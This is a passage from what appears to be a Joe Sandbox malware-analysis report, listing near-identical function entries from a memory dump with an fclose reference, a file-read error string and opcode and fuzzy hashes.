fclose.MSVCRT ref: 00007FF6EF655520

Strings

fs_file_read, xrefs: 00007FF6EF655555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF65555C

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 26eab73764b8ffa4d3fb92dd5a0b9e18be74589822eee4ae34119ae3bc3fb425
Instruction ID: dfcb1d6ae9d4ff427fcaf1369cc1818d2edae7a8482b162114b595422635dc61
Opcode Fuzzy Hash: 26eab73764b8ffa4d3fb92dd5a0b9e18be74589822eee4ae34119ae3bc3fb425
Instruction Fuzzy Hash: 1BF05E27B1821643F9529B04B4407B9135A1F4577DF4A0931DD4CAB6D2AE3EAC86A306

Function 00007FF6EF655382 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6EF655520

Strings

fs_file_read, xrefs: 00007FF6EF655555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF65555C

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 6007a24590ed1844e50f48340ece50facd8b82cec4727746faed6b73d15800c1
Instruction ID: 158cd23c653e2e61201ccb42def642dbb59dde8ec580ed007b4497ae490a158c
Opcode Fuzzy Hash: 6007a24590ed1844e50f48340ece50facd8b82cec4727746faed6b73d15800c1
Instruction Fuzzy Hash: 6BF05E27B1821243F9529B04B4457B9135A1F4577CF4A0931DD5CAB6D2AE3EAC86A306

Function 00007FF6EF65536E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6EF655520

Strings

fs_file_read, xrefs: 00007FF6EF655555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF65555C

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 598216c1ee724cec4807be68ed95eefc0d911833e57af68f66b0cc78dd6263b9
Instruction ID: a6e4ee3f26074366fac479b120d612f1490908929dfdd50ceaac3bed3d8efc8f
Opcode Fuzzy Hash: 598216c1ee724cec4807be68ed95eefc0d911833e57af68f66b0cc78dd6263b9
Instruction Fuzzy Hash: 41F05E27B1821243F9529B04B4407B9135A2F4577CF4A0931DD4CAB6D2AE3EAC86A306

Function 00007FF6EF655276 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6EF655520

Strings

fs_file_read, xrefs: 00007FF6EF655555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF65555C

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 818da8196cb84a01bb97c639c4f07d118bc4aba2fcbbab1dbc363c6cbe084887
Instruction ID: 65ea38442251091a9576cd3dc29a11fa6f8f7917f1cf4be7e2b87c2d8fab1a0e
Opcode Fuzzy Hash: 818da8196cb84a01bb97c639c4f07d118bc4aba2fcbbab1dbc363c6cbe084887
Instruction Fuzzy Hash: 6DF05E27B1821243F9529B04B4407B9135A1F4577CF4A0931DD4CAB6D2AE3EAC86A306

Function 00007FF6EF655280 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6EF655520

Strings

fs_file_read, xrefs: 00007FF6EF655555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF65555C

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 0a634cbf67000b6e04af3113307a55f98b113c92dc51018462aa1a852187c35c
Instruction ID: f27c1d457d57cf753e759cd64cfd6058fbdbd6a73e999af721828410d372ccfc
Opcode Fuzzy Hash: 0a634cbf67000b6e04af3113307a55f98b113c92dc51018462aa1a852187c35c
Instruction Fuzzy Hash: 65F05E27B1821243F9529B04B4407B9135A1F4577CF4A0932DD4CAB6D2AE3EAC86A306

Function 00007FF6EF65526C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6EF655520

Strings

fs_file_read, xrefs: 00007FF6EF655555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF65555C

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 6007a24590ed1844e50f48340ece50facd8b82cec4727746faed6b73d15800c1
Instruction ID: 158cd23c653e2e61201ccb42def642dbb59dde8ec580ed007b4497ae490a158c
Opcode Fuzzy Hash: 6007a24590ed1844e50f48340ece50facd8b82cec4727746faed6b73d15800c1
Instruction Fuzzy Hash: 6BF05E27B1821243F9529B04B4457B9135A1F4577CF4A0931DD5CAB6D2AE3EAC86A306

Function 00007FF6EF655258 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6EF655520

Strings

fs_file_read, xrefs: 00007FF6EF655555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF65555C

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 598216c1ee724cec4807be68ed95eefc0d911833e57af68f66b0cc78dd6263b9
Instruction ID: a6e4ee3f26074366fac479b120d612f1490908929dfdd50ceaac3bed3d8efc8f
Opcode Fuzzy Hash: 598216c1ee724cec4807be68ed95eefc0d911833e57af68f66b0cc78dd6263b9
Instruction Fuzzy Hash: 41F05E27B1821243F9529B04B4407B9135A2F4577CF4A0931DD4CAB6D2AE3EAC86A306

Function 00007FF6EF655262 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6EF655520

Strings

fs_file_read, xrefs: 00007FF6EF655555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF65555C

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 26eab73764b8ffa4d3fb92dd5a0b9e18be74589822eee4ae34119ae3bc3fb425
Instruction ID: dfcb1d6ae9d4ff427fcaf1369cc1818d2edae7a8482b162114b595422635dc61
Opcode Fuzzy Hash: 26eab73764b8ffa4d3fb92dd5a0b9e18be74589822eee4ae34119ae3bc3fb425
Instruction Fuzzy Hash: 1BF05E27B1821643F9529B04B4407B9135A1F4577DF4A0931DD4CAB6D2AE3EAC86A306

Function 00007FF6EF6551AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6EF655520

Strings

fs_file_read, xrefs: 00007FF6EF655555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF65555C

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 6007a24590ed1844e50f48340ece50facd8b82cec4727746faed6b73d15800c1
Instruction ID: 158cd23c653e2e61201ccb42def642dbb59dde8ec580ed007b4497ae490a158c
Opcode Fuzzy Hash: 6007a24590ed1844e50f48340ece50facd8b82cec4727746faed6b73d15800c1
Instruction Fuzzy Hash: 6BF05E27B1821243F9529B04B4457B9135A1F4577CF4A0931DD5CAB6D2AE3EAC86A306

Function 00007FF6EF655198 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6EF655520

Strings

fs_file_read, xrefs: 00007FF6EF655555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF65555C

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 598216c1ee724cec4807be68ed95eefc0d911833e57af68f66b0cc78dd6263b9
Instruction ID: a6e4ee3f26074366fac479b120d612f1490908929dfdd50ceaac3bed3d8efc8f
Opcode Fuzzy Hash: 598216c1ee724cec4807be68ed95eefc0d911833e57af68f66b0cc78dd6263b9
Instruction Fuzzy Hash: 41F05E27B1821243F9529B04B4407B9135A2F4577CF4A0931DD4CAB6D2AE3EAC86A306

Function 00007FF6EF6551A2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6EF655520

Strings

fs_file_read, xrefs: 00007FF6EF655555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF65555C

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 26eab73764b8ffa4d3fb92dd5a0b9e18be74589822eee4ae34119ae3bc3fb425
Instruction ID: dfcb1d6ae9d4ff427fcaf1369cc1818d2edae7a8482b162114b595422635dc61
Opcode Fuzzy Hash: 26eab73764b8ffa4d3fb92dd5a0b9e18be74589822eee4ae34119ae3bc3fb425
Instruction Fuzzy Hash: 1BF05E27B1821643F9529B04B4407B9135A1F4577DF4A0931DD4CAB6D2AE3EAC86A306

Function 00007FF6EF65557B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6EF655520

Strings

fs_file_read, xrefs: 00007FF6EF655555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF65555C

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 3fbfb2e90ff6b74489a7a57e3deef451135282a2a552d71fd954ab909784cf6c
Instruction ID: 86d5cb7930deea4094c3c7b668ace1629a8ceeee3dc9963ec287bbe99c4d15d2
Opcode Fuzzy Hash: 3fbfb2e90ff6b74489a7a57e3deef451135282a2a552d71fd954ab909784cf6c
Instruction Fuzzy Hash: 17F05E2BB1811243F9539B04B4407B9135A1F4576CF4A0932DD4CAB6D2AE3EAD86B306

Function 00007FF6EF65516B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6EF655520

Strings

fs_file_read, xrefs: 00007FF6EF655555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF65555C

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 818da8196cb84a01bb97c639c4f07d118bc4aba2fcbbab1dbc363c6cbe084887
Instruction ID: 65ea38442251091a9576cd3dc29a11fa6f8f7917f1cf4be7e2b87c2d8fab1a0e
Opcode Fuzzy Hash: 818da8196cb84a01bb97c639c4f07d118bc4aba2fcbbab1dbc363c6cbe084887
Instruction Fuzzy Hash: 6DF05E27B1821243F9529B04B4407B9135A1F4577CF4A0931DD4CAB6D2AE3EAC86A306

Function 00007FF6EF655175 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6EF655520

Strings

fs_file_read, xrefs: 00007FF6EF655555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF65555C

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 0a634cbf67000b6e04af3113307a55f98b113c92dc51018462aa1a852187c35c
Instruction ID: f27c1d457d57cf753e759cd64cfd6058fbdbd6a73e999af721828410d372ccfc
Opcode Fuzzy Hash: 0a634cbf67000b6e04af3113307a55f98b113c92dc51018462aa1a852187c35c
Instruction Fuzzy Hash: 65F05E27B1821243F9529B04B4407B9135A1F4577CF4A0932DD4CAB6D2AE3EAC86A306

Function 00007FF6EF655157 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6EF655520

Strings

fs_file_read, xrefs: 00007FF6EF655555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF65555C

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 26eab73764b8ffa4d3fb92dd5a0b9e18be74589822eee4ae34119ae3bc3fb425
Instruction ID: dfcb1d6ae9d4ff427fcaf1369cc1818d2edae7a8482b162114b595422635dc61
Opcode Fuzzy Hash: 26eab73764b8ffa4d3fb92dd5a0b9e18be74589822eee4ae34119ae3bc3fb425
Instruction Fuzzy Hash: 1BF05E27B1821643F9529B04B4407B9135A1F4577DF4A0931DD4CAB6D2AE3EAC86A306

Function 00007FF6EF655161 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6EF655520

Strings

fs_file_read, xrefs: 00007FF6EF655555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF65555C

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 6007a24590ed1844e50f48340ece50facd8b82cec4727746faed6b73d15800c1
Instruction ID: 158cd23c653e2e61201ccb42def642dbb59dde8ec580ed007b4497ae490a158c
Opcode Fuzzy Hash: 6007a24590ed1844e50f48340ece50facd8b82cec4727746faed6b73d15800c1
Instruction Fuzzy Hash: 6BF05E27B1821243F9529B04B4457B9135A1F4577CF4A0931DD5CAB6D2AE3EAC86A306

Function 00007FF6EF65514D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6EF655520

Strings

fs_file_read, xrefs: 00007FF6EF655555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF65555C

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 598216c1ee724cec4807be68ed95eefc0d911833e57af68f66b0cc78dd6263b9
Instruction ID: a6e4ee3f26074366fac479b120d612f1490908929dfdd50ceaac3bed3d8efc8f
Opcode Fuzzy Hash: 598216c1ee724cec4807be68ed95eefc0d911833e57af68f66b0cc78dd6263b9
Instruction Fuzzy Hash: 41F05E27B1821243F9529B04B4407B9135A2F4577CF4A0931DD4CAB6D2AE3EAC86A306

Function 00007FF6EF6551B6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6EF655520

Strings

fs_file_read, xrefs: 00007FF6EF655555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF65555C

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 818da8196cb84a01bb97c639c4f07d118bc4aba2fcbbab1dbc363c6cbe084887
Instruction ID: 65ea38442251091a9576cd3dc29a11fa6f8f7917f1cf4be7e2b87c2d8fab1a0e
Opcode Fuzzy Hash: 818da8196cb84a01bb97c639c4f07d118bc4aba2fcbbab1dbc363c6cbe084887
